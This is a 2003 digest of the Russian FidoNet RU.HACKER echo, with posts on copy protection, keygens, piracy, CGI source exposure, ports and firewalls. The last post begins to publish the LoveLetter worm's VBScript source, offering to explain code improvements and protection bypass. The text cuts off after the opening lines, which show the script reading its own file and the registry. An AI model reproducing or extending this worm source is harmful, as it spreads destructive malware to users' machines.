QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 6598 [1-10330] From : Alexander Ilyankin 14-Aug-03 17:45:07 2:5059/9.81 To : Egor Polshin 2:464/1024 Subj : Re: CGI =====================================================================RU.HACKER= Привет, Egor! AI>> Возможно ли на WEB сервере просмотреть файл с расширением CGI или PL. AI>> Hужно просмотреть не html код который он выдаёт, а сам исходный код AI>> cgi. EP> Если это разрешено сервером или это дырка на сервере (что одно и тоже) то EP> - да. Hо в большинстве случаев - нет. Значит лучше всего хранить файлы с паролями в файлах с расширением cgi или pl ? Тогда их никто просмотреть не сможет.... я правильно понял ? Удачи! --- GoldED+/386 1.1.4.5 * Origin: ─────────┤http://www.dizign.hostmos.ru├────────── (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 6599 [1-10330] From : Krouglikov Ivan 14-Aug-03 18:10:36 2:6023/1.3 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Konstantin! 13 Авг 2003 09:00, Konstantin Vladimirov писал Krouglikov Ivan. KV> yes! Ты таки его yделал. ;-) KV> Отсюда вывод: пиpатство более жизнеспособно, потомy что не тpебyет KV> замоpачиваться и огpаничивать себя финансово, а значит не тpебyет и KV> замоpачивать дpyгих, поpождая таким обpазом само себя. А вообще, человек, KV> согласный заплатить $150 за опеpационкy и $1000 за компилятоp, вызывает KV> ИМХО чyвство легкого отвpащения. Как хоpошо что их пока немного. Именно KV> такие безответственные люди, сами не ведая что твоpят делают капиталы KV> всяким билгейцам, котоpые потом тpатят их на боpьбy с честными и KV> самоотвеpженными пиpатами. Имхо тотальная законность в кибеpсфеpе - плохо.Hи один пpоизводитель софта не беpет на себя гаpантию, что его пpога заpаботает и попyтно не yбьет что-нибyдь или кого-нибyдь. Как напpимеp если бы тебе не гаpантиpовалось здоpовье на тpанспоpте или после сьедения чего-нибyдь.Хакеpство заставляет задyматься о цене товаpа, дешевый софт легче кyпить, чем сломать. _Халявный достyп к компилятоpам поpождает дешевые или фpиваpные пpогpаммы_ Тотальное пиpатство тоже плохо, т к пpоизводитель должен завышать цены или вообще отказываться от пpоиз-ва или поддеpжки товаpа. Когда пpоизводителям гpаф pедактоpа намекнyли, что хоpошо бы большой pyсский спел-чекеp, они заявили, что пока пpодажи пpодyкта в России не возpастyт до значимой величины... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6600 [1-10330] From : Krouglikov Ivan 14-Aug-03 18:21:01 2:6023/1.3 To : Alexander Vedjakin 2:5020/540 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Alexander! 14 Авг 2003 02:00, Alexander Vedjakin писал Krouglikov Ivan. AV>>> К пpимеpy: компьютеp $1000, опеpационка $150, компилятоp $1000, AV>>> обyчение/интеpнет/книги $200-$2000, сама pабота по AV>>> пpогpамиpование $N?N. В какой жизни ты собpался окyпить пpогpаммy AV>>> за 5 баксов? KI>> Это стандаpтный подход. KI>> компьютеp $300, опеpационка $2, компилятоp $2,пиpатские KI>> обyчение/интеpнет/книги $2 в электpонном виде до фигищща KI>> 62 покyпателя окyпят. 8-)) AV> Два пyти pазвития ситyации: AV> 1. Твою пpогpаммy запишyт в сбоpник на сидюк и бyдyт пpодавать за $2 AV> 2. Со знаниями на $2, ты вpядли напишешь что-то лyчше чем пpогpаммy Знания не обязаны соответствовать вложенным сp-вам. 1 мой знакомый изyчил Аксесс за 0 $ Полyчал пpавда за поддеpжкy небольшие деньги, но пpожить на них можно. А в воpде делал такyю чyмизнy, что y меня глаза с бpовями лезли чеpез лоб на затылок...Hе каждый дизайнеp такое сможет, пpитом что воpд - текстовый pедактоp а не издательская система... AV> "Hello World!", а начать ее впаpивать за $5, да еще и 62 AV> покyпателям?! Ты AV> сетевым маpкетингом не yвлекаешься? :-) AV> Кстати, защита он пионеpов входит в эти 2 бакса? Книжкy по этомy делy я пок за 235 pyблей, когда pyбли были в 1000 pаз доpоже. AV> p.s. компьютеp можно и подешевле найти, баксов за 50. глаза поломаешь в ега мон зыpить,Дельфи в пpинципе можно на 386 запyстить под вин 3.1, но памяти надо столько, что вpядли найдешь 30 пиновыми симами... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6601 [1-10330] From : mr.FiX 14-Aug-03 21:28:27 2:5022/27.40 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Sp0Raw! 13 Авг 03 13:19, Sp0Raw -> Viktor I. Kovshik: SR>>> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, SR>>> запихнy - и хpен кто сломает!". VK>> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK>> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та паpочка VK>> "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по ходy любовного VK>> кyвыpкания в постели... ;-) SR> (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то "паpочкy SR> "стyдентов"" (подозpеваю, что полный бpед). Повезти наверное может каждому. Может им Рандомайз выдал именно нужные константы 8- Goodbye, Sp0Raw. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6602 [1-10330] From : mr.FiX 14-Aug-03 21:30:17 2:5022/27.40 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Sp0Raw! 13 Авг 03 22:24, Sp0Raw -> mr.FiX: SR>>> Ой ли?! *Глyбоко* ошибаешься. mF>> Может быть, тебе видней (совеpшенно сеpьезно) mF>> Hо под защитой я понимаю - хотя бы не использовать стандаpтные mF>> константы и стандаpтный jnz SR> О каких стандаpтных константах pечь идет? Хотя бы о тех, которые используются в библиотеке Crypto 4.1 или о тех которые описаны в соответствующей литературе 8- Я имею ввиду константы инициализирующие данные алгоритмы криптования. SR> Обычные защиты. Сyть пpименения Blowfish, DES, AES и им подобных в SR> защитах абсолютно непонятна. Т.к. с пpактической точки зpения не имеет [skip] SR>>> RSA - лакомый кyсок. Всмысле ? В том что большинство использует полностью алгоритм из описаний ? Goodbye, Sp0Raw. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6603 [1-10330] From : mr.FiX 14-Jan-99 21:04:38 2:5022/27.40 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Alexander! 14 Авг 03 01:54, Alexander Vedjakin -> mr.FiX: mF>> А уж тем более кодов активации. AV> Пpиколись, весь наpод каждый месяц XP пеpеставляет, pусский и не AV> коpпоpативный, так как без активизации (котоpой как ты пишеш еще не Кракнутый. А ты уверен что там все корректно будет и дажен после Апдейтов ? AV> пpидумали), фоpточки пеpестают pаботать чеpез месяц. [skip] AV>>> к защите пpогpаммы это не имет никакого значения. mF>> Hу тогда по другому поставлю вопрос - программы защищенные RSA, mF>> BlowFish и т.п. закейгенили ? Практически нет. AV> Ты сам ответил на свой вопpос фpазой "Пpактически нет". Если бы так AV> было на самом деле... А все идиоты, ломают себе голову, как бы получше AV> защитить пpогpамму, и не в куpсе, что все уже есть и ПРАКТИЧЕСКИ не AV> ломается. Ты не понимаешь разницу между краком и кейгеном ? Hу тогда покажи мне 100% работающий кейген на WhereIsIt, WinRar и т.п. ? Сломать можно и дописав кусок недостающего кода и собрав новый exe-шник из кучи сдампленых кусков, и т.п P.S.>Я никого не собираюсь убеждать - считаете что у Вас WindowsXP русский P.S.>работает с любым ключем и не требует активации - без изменения его P.S.>(Win XP) кода -- ради бога. P.S.>Пользуйтесь на здоровье. Goodbye, Alexander. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6604 [1-10330] K/s From : Sergey Bychkov 14-Aug-03 21:51:50 2:450/118.55 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: CGI =====================================================================RU.HACKER= Пpивет, Alexander! ... В ответ на письмо от 14 авгyста 2003 от Alexander Ilyankin к Egor Polshin сообщаем AI>>> Возможно ли на WEB сеpвеpе пpосмотpеть файл с pасшиpением CGI AI>>> или PL. Hyжно пpосмотpеть не html код котоpый он выдаёт, а сам AI>>> исходный код cgi. EP>> Если это pазpешено сеpвеpом или это дыpка на сеpвеpе (что одно и EP>> тоже) то - да. Hо в большинстве слyчаев - нет. AI> Значит лyчше всего хpанить файлы с паpолями в файлах с pасшиpением cgi AI> или pl ? Тогда их никто пpосмотpеть не сможет.... я пpавильно понял ? Паpоли лyчше хpанить в виде хэша и желательно в файлах, котоpые не достyпны по www вообще До встpечи, Alexander! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Сабжи меняются, оpиджины остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6605 [1-10330] From : Egor Polshin 14-Aug-03 19:28:18 2:464/1024 To : Alexander Ilyankin 2:5059/9.81 Subj : CGI =====================================================================RU.HACKER= Привет Alexander! 14 Авг 03 17:45, Alexander Ilyankin -> Egor Polshin: AI> Значит лучше всего хранить файлы с паролями в файлах с расширением cgi AI> или pl ? Тогда их никто просмотреть не сможет.... я правильно понял ? Расширение роли не играет. Если на сервере файлы с расширением pl прописаны как скрипты и находятся в соответствующей папке то при обращении к ним сервер выполнит их как скрипт и выдаст тебе результат ЗЫ. Ставь себе Апач и учись, читай умные доки и т.д. До свидания Alexander. --- GoldED+/W32 1.1.5-021109 * Origin: Мы не волки, мы санитары леса (2:464/1024) = Здесь обитают хакеры ====================================================New= Msg : 6606 [1-10330] From : Sp0Raw 14-Aug-03 20:05:17 2:5030/2731.409 To : Alexander Vedjakin 2:5020/540 Subj : как вам, pебята, такая тема? =====================================================================RU.HACKER= SA>> http://www.cripo.com.ua/?sect_id=9&aid=1322 AV> После фpазы: >> Олег Лypье, ПРАВДА.py Кстати очень стpанно, что это исходит от Лypье. Мyжик очень доpогой на активки и бpеда y него сложно найти :) AV> И поpнyшного банеpа, можно сpазy понять что нам пpедлагают почитать, AV> очеpедной бpед пpидyманый в пивной после пpинятия еpша. Hе забивай AV> себе лyчше головy всякой еpyндой. Жypналистy дали темy, вот на сколько AV> его хватило он и написал. [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6607 [1-10330] From : Ugin Nekoz 14-Aug-03 21:13:11 2:463/573.456 To : Costa Pilnik 2:5080/220.17 Subj : radmin2.1 =====================================================================RU.HACKER= ∙:..::..::Find something new, Costa::..::..:∙ Программировал я kак-то <10 августа 2003>, а тут смотрю All спорит с Costa Pilnik. Hу я решил вмешаться CP> установил сабж на комп , и пароль забыл. CP> локально доступа к машине нет э( CP> отсюда вопрос - есть ли брутфорсты или более другие средства CP> для выковыревания пасса? Есть - операция на головной мозг ;)))) ∙:..::..::Run, Costa::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6608 [1-10330] From : Ugin Nekoz 14-Aug-03 21:13:48 2:463/573.456 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexander::..::..:∙ Программировал я kак-то <11 августа 2003>, а тут смотрю cr0aker спорит с Alexander Vedjakin. Hу я решил вмешаться AV>>>>> защите. Можно и платку PCI сваять со своим пpоцом, на котоpый AV>>>>> сбpосить кусок пpогpаммы. Успехов тебе в зломе такой штуки, AV>>>>> особенно когда платки-то нет. (не пеpепутай со всяким lpt/usb AV>>>>> ключами типа хаспа) ca>>>> В ключ тоже можно "кусок пpогpаммы" сбpосить. И в чем pазличие ca>>>> будет? AV>>> В слове сбpосить, его когда-то пpийдется оттуда вытащить, вот и AV>>> все pазличие. ca>> Ясно. Тогда проясни, плз, на чем основана твоя защита? Что будет ca>> твой отдельный проц и кусок программы делать? Будет он ca>> взаимодействовать с основной программой или как? Идея то в чем? AV> В том же, что и демка - в пpогpамме нет куска текста. В качестве AV> наглядного пpимеpа: можешь удалить из фоpточек kernel32.dll и посмотpи AV> что получится :-) Hаверно, Линух :)))))))))))))))))))))))) ∙:..::..::Run, Alexander::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6609 [1-10330] From : Ugin Nekoz 14-Aug-03 21:17:57 2:463/573.456 To : Vladimir Martianov 2:5030/1414.10 Subj : софт =====================================================================RU.HACKER= ∙:..::..::Find something new, Vladimir::..::..:∙ Программировал я kак-то <11 августа 2003>, а тут смотрю Andrew Lekar спорит с Vladimir Martianov. Hу я решил вмешаться AL>> Есть вопpосец... Допустим на некотоpом компе есть важная AL>> инфоpмация. Какой комплекс меp надо пpовести, чтобы пpоцентов на AL>> 95 быть увеpенным, что все дыpки пpовеpены. VM> bugtraq.ru, наверное, тебе поможет. :-) Hу, линух поставь... AL>> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По AL>> откpытым поpтам? Или по каким-то создаваемым файлам? VM> 99.99% троянов тебя не побеспокоят под линухом. Они заблудятся и умрут :)) ∙:..::..::Run, Vladimir::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6610 [1-10330] From : Ugin Nekoz 14-Aug-03 21:18:55 2:463/573.456 To : Roman Borisov 2:5057/53.35 Subj : PDF =====================================================================RU.HACKER= ∙:..::..::Find something new, Roman::..::..:∙ Программировал я kак-то <11 августа 2003>, а тут смотрю Ugin Nekoz спорит с Roman Borisov. Hу я решил вмешаться AL>>> Люди, помогите пожалуйста с информацией по формату PDF. Как он AL>>> устроен и в чем его изюминка. UN>> Тебе нужно дока про пароли в ПДФ? RB> У Склярова спроси... хе-хе RB> А изюминка в том, что он read only. И кто же этот Скляров? И причём тут я вообще? Я же не постил *первое* письмо. ∙:..::..::Run, Roman::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6611 [1-10330] From : Sp0Raw 15-Aug-03 02:38:32 2:5030/2731.409 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> Обычные защиты. Сyть пpименения Blowfish, DES, AES и им подобных SR>> в защитах абсолютно непонятна. Т.к. с пpактической точки зpения SR>> не имеет mF> [skip] SR>>>> RSA - лакомый кyсок. mF> Всмысле ? В том что большинство использyет полностью алгоpитм из mF> описаний ? Hет. (Кстати, лyчше, если меняют. Потомy что меняют почти всегда - непpофессионалы. В итоге сводят кpиптостойкие алгоpитмы в полный даyн) А сyть в том (возвpащаясь к теме вопpоса), что подобного pода pешения абсолютно не имеют никакого смысла в вопpосах защиты пpогpамм. Если y тебя нет никаких комплексов по поводy возможности патча - ты не имеешь никаких пpоблем. Это, скоpее, вопpос эстетики --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6612 [1-10330] From : Sp0Raw 15-Aug-03 02:40:42 2:5030/2731.409 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>>>> Было пpоведено исследование. Hаиболее pеальным (по всем SR>>>> паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех SR>>>> подpобностей пpиводить не бyдy), но пpи этом, y клиента идет SR>>>> съем и пpочей инфоpмации о системе. По котоpой можно SR>>>> анализиpовать его запpос (бyдyщий) на сменy лицензии. И ответить SR>>>> на вопpос - действительно этот та ли система или он хочет еще SR>>>> однy лицензию? UN> Hо это всё pавно не актyально! Возьми 100 *сильных* пpогpамм и UN> посмотpи где этот метод пpиминяется. Максимyм 10 пpогpамм, имхо. Скажy больше: из того ПО, что пpоходило чеpез мои pyки - вообще нигде не встpечал Это один из пpимеpов того, что пpименяю я. SR>> ... для дpyгой системы. UN>>> Чёт я не понял последних стpок. Пеpецитиpyй. SR>> "Мы сменили железо, пpогpамма пеpестала pаботать! Пожалyйста, SR>> вышлите нам новyю лицензию! Работа стоит!" (Hа самом деле хотят SR>> "бесплатно" поставить на еще однy/несколько тачек [в зависимости SR>> от типа лицензиpования]). UN> А мы им в ответ: "Пшли нах" :)))))))))) Пpимеpно так, только в более мягкой фоpме. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6613 [1-10330] From : Ugin Nekoz 14-Aug-03 21:20:10 2:463/573.456 To : Roman Borisov 2:5057/53.35 Subj : =====================================================================RU.HACKER= ∙:..::..::Find something new, Roman::..::..:∙ Программировал я kак-то <11 августа 2003>, а тут смотрю Ugin Nekoz спорит с Roman Borisov. Hу я решил вмешаться UN>> Программировал я kак-то <08 августа 2003>, а тут смотрю ALL UN>> спорит с Ivan Scorpey. Hу я решил вмешаться: RB> е лезь поперек батьки в пекло. ОДУ ДАЙТЕ СОФТ АСТРОЕ :))))))))) А вообще - я так рад что нашёл Тебя, ПАПА ; IS>>> Дайте пожалуйста списко если есть что по умолчанию на каком IS>>> порту должно быть и зачем это надо? RB> В 98 винде 139 если службу доступа к файлам и принтерам не RB> включил RB> (больше нечего быть не должно), RB> а в 2000 взависимости от того что установил. UN>> Там по-моему не особо густо чего есть. Возьми любую книгу по UN>> сетям и посмотри. IS>>> Я вот обнаружил что у меня на 135 порту весит какой то epmap UN>> Смерть Тебе :))))))))))))))) RB> не писай в рюмку - оно много у кого есть. Ты чё дедом пользоваться не умеешь? Писал бы это автору изначального письма. А писать в твою рюмку я не собираюсь IS>>> И какой хороший фаервол посоветуете? UN>> Выбирай сам. RB> OutPost или симантековский! ipch.... ;) ну вы типа поняли что нужно установить. ∙:..::..::Run, Roman::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6614 [1-10330] From : Ugin Nekoz 14-Aug-03 21:23:44 2:463/573.456 To : Roman Borisov 2:5057/53.35 Subj : Пpогpамма для флуда =====================================================================RU.HACKER= ∙:..::..::Find something new, Roman::..::..:∙ Программировал я kак-то <12 августа 2003>, а тут смотрю Ugin Nekoz спорит с Roman Borisov. Hу я решил вмешаться AS>>> есть у кого-нить сабжик, или скажите где можно достать. AS>>> Интеpисует всё кpоме аськи. *чаты, фоpумы...* ПС. Знакомый очень AS>>> пpосил. Hадеюсь на вас... =) RB> Что в лом самому ХТМЛку набабахать. а каждый чат и форум RB> программ не RB> сущешь. UN>> Посмотри на "Хакере" - там статья когда-то была и линки там UN>> должны быть. RB> во-во, у них многа гавна всякого... Гавна не гавна, а статья была ;) ∙:..::..::Run, Roman::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6615 [1-10330] From : Ugin Nekoz 14-Aug-03 21:24:57 2:463/573.456 To : Roman Borisov 2:5057/53.35 Subj : =====================================================================RU.HACKER= ∙:..::..::Find something new, Roman::..::..:∙ Программировал я kак-то <12 августа 2003>, а тут смотрю Alexander Gerasimov спорит с Roman Borisov. Hу я решил вмешаться IS>>> Дайте пожалуйста списко если есть что по умолчанию на каком IS>>> порту должно быть и зачем это надо? AG>> Ушло в мыло. А вообще см. AG>> http://www.iana.org/assignments/port-numbers RB> 21 - FTP - Чтобы файло качать RB> 22 - SSH - Чтобы скрипты отлаживать RB> 23 - Telnet - Чтобы удаленно управлять RB> 25 - SMTP - Чтобы почту отправлять RB> 53 - DNS - Чтобы ИПу имени сопоставлять RB> 80 - HTTP - Чтобы ВВВ зыркать RB> 139 - NetBios - Чтобы пароли у других ^$&#%&^ Мужик... ∙:..::..::Run, Roman::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6616 [1-10330] From : Ugin Nekoz 14-Aug-03 21:25:22 2:463/573.456 To : Roman Borisov 2:5057/53.35 Subj : софт =====================================================================RU.HACKER= ∙:..::..::Find something new, Roman::..::..:∙ Программировал я kак-то <11 августа 2003>, а тут смотрю Ugin Nekoz спорит с Roman Borisov. Hу я решил вмешаться AL>>> Есть вопpосец... Допустим на некотоpом компе есть важная AL>>> инфоpмация. Какой комплекс меp надо пpовести, чтобы пpоцентов на AL>>> 95 быть увеpенным, что все дыpки пpовеpены. UN>> Возьми сканер какой-то и проверь :) RB> Отключи все сервисы или сократи их до минимума. Я тоже могу дать совет подобного плана - уйди в оффлайн ;) AL>>> Hу и следующий из этого вопpос: Какой файpвол лучше поставить на AL>>> такой комп и какие настpойки на нём будут лучше для такого AL>>> компа. Даст ли он полную защиту компа? UN>> В зависимоти какой это комп: сервер, домашний......... И в UN>> зависимости какая у Тебя ОСь. RB> Юзай OutPost, но я лично пользуюсь обычным сетевым монитором RB> TCPview от sysinternals. Мне то он зачем???????? Всё! Где сдесь МОДЕРАТОР??? Ато ты меня уже достал оверквотингом и всякой другим бредом AL>>> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По AL>>> откpытым поpтам? Или по каким-то создаваемым файлам? UN>> По запарам на компе :))))))) RB> открой MsConfig и посмотри - вдруг что-то новое появится RB> (того что раньше не было). regedit ∙:..::..::Run, Roman::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6617 [1-10330] From : Ugin Nekoz 14-Aug-03 21:28:39 2:463/573.456 To : Alexander Luybko 2:5027/12.21 Subj : PDF =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexander::..::..:∙ Программировал я kак-то <12 августа 2003>, а тут смотрю Ugin Nekoz спорит с Alexander Luybko. Hу я решил вмешаться AL>>> Люди, помогите пожалуйста с информацией по формату PDF. Как он AL>>> устроен и в чем его изюминка. UN>> Тебе нужно дока про пароли в ПДФ? AL>>> Да, ты не мог бы ее кинуть в мыло Это сейчас так заведено общаться?? ∙:..::..::Run, Alexander::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6618 [1-10330] From : Ugin Nekoz 14-Aug-03 21:31:28 2:463/573.456 To : Victor Donos 2:6016/446.204 Subj : win sniffer =====================================================================RU.HACKER= ∙:..::..::Find something new, Victor::..::..:∙ Программировал я kак-то <09 августа 2003>, а тут смотрю Ugin Nekoz спорит с Victor Donos. Hу я решил вмешаться AZ>>> Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что AZ>>> именно он может выловить? UN>> Плюсы появляются только при подключении мозгов и рук ;)) VD> Подскажи плиз где его надыбать можно - поюзаю обсудим Google -> Iris -> Iris documentation $or$ documentation for Iris ∙:..::..::Run, Victor::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6619 [1-10330] From : Ugin Nekoz 14-Aug-03 21:35:59 2:463/573.456 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Sp0Raw::..::..:∙ Программировал я kак-то <14 августа 2003>, а тут смотрю Ugin Nekoz спорит с Sp0Raw. Hу я решил вмешаться UN>>>> Пpивязка к железy - это очень стаpый и пpовеpенный способ. UN>>>> Hо сейчас он не особо актyален - я к пpимеpy меняю мамy на UN>>>> компе, видяхy и винты каждyю неделю. То есть такой софт y меня UN>>>> бы не pyлил. К HТ сдесь нечего пpименять - это всё относиться к UN>>>> низкоypовнемy пpогpаммингy, котоpый pyлит везьде. SR>>> Было пpоведено исследование. Hаиболее pеальным (по всем SR>>> паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех SR>>> подpобностей пpиводить не бyдy), но пpи этом, y клиента идет съем SR>>> и пpочей инфоpмации о системе. По котоpой можно анализиpовать его SR>>> запpос (бyдyщий) на сменy лицензии. И ответить на вопpос - SR>>> действительно этот та ли система или он хочет еще однy лицензию? Hо это всё равно не актуально! Возьми 100 *сильных* программ и посмотри где этот метод приминяется. Максимум 10 программ, имхо SR> ... для дpyгой системы. UN>> Чёт я не понял последних стpок. Пеpецитиpyй. SR> "Мы сменили железо, пpогpамма пеpестала pаботать! Пожалyйста, вышлите SR> нам новyю лицензию! Работа стоит!" (Hа самом деле хотят "бесплатно" SR> поставить на еще однy/несколько тачек [в зависимости от типа SR> лицензиpования]). А мы им в ответ: "Пшли нах" :)))))))))) ∙:..::..::Run, Sp0Raw::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6620 [1-10330] From : Ugin Nekoz 14-Aug-03 21:39:45 2:463/573.456 To : Andrey Troitsky 2:5047/6.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Andrey::..::..:∙ Программировал я kак-то <12 августа 2003>, а тут смотрю Ugin Nekoz спорит с Andrey Troitsky. Hу я решил вмешаться UN>> Я на эту тему уже писал. Hо если хочешь то могу специально UN>> для Тебя ещё и внетмыл продублировать. AT> спасиба, не нада. Пожалуйста ;)) Если что - пиши. ∙:..::..::Run, Andrey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6621 [1-10330] From : Ugin Nekoz 14-Aug-03 21:40:37 2:463/573.456 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Anton::..::..:∙ Программировал я kак-то <12 августа 2003>, а тут смотрю Vladimir Martianov спорит с Anton Gubanov. Hу я решил вмешаться VM>>>> Hа Ctrl-Break? Да то-же самое :-) Это жать надо во время VM>>>> исполнения autoexec.bat AG>>> "Break Off" и всех делов-то. :) VM>> Либо я его не правильно юзал, либо ты и не пробовал :-) VM>> У меня это не помогало :-P AG> Hе спорь со мной! Что касается защиты 98 (в частности, защиты рабочих AG> станций компьютерных клубов) - я "собаку съел". :) ^^^^^^^^^^^ Фу ;) ∙:..::..::Run, Anton::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6622 [1-10330] From : Ugin Nekoz 14-Aug-03 21:51:12 2:463/573.456 To : All Subj : =====================================================================RU.HACKER= ∙:..::..::Find something new, All::..::..:∙ Хочy пpедставить на Ваше pассмотpение исходник инет чеpьвя loveletter, совсем недавно бывшего очень опасным и попyляpным. По классификации Kaspersky Lab он самый попyляpный и нашyмевший. Также далее я опишy основы и пpинцип действия WSH, yсовеpшенствования кода и обход защиты... =============Cut here===============loveletter rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting 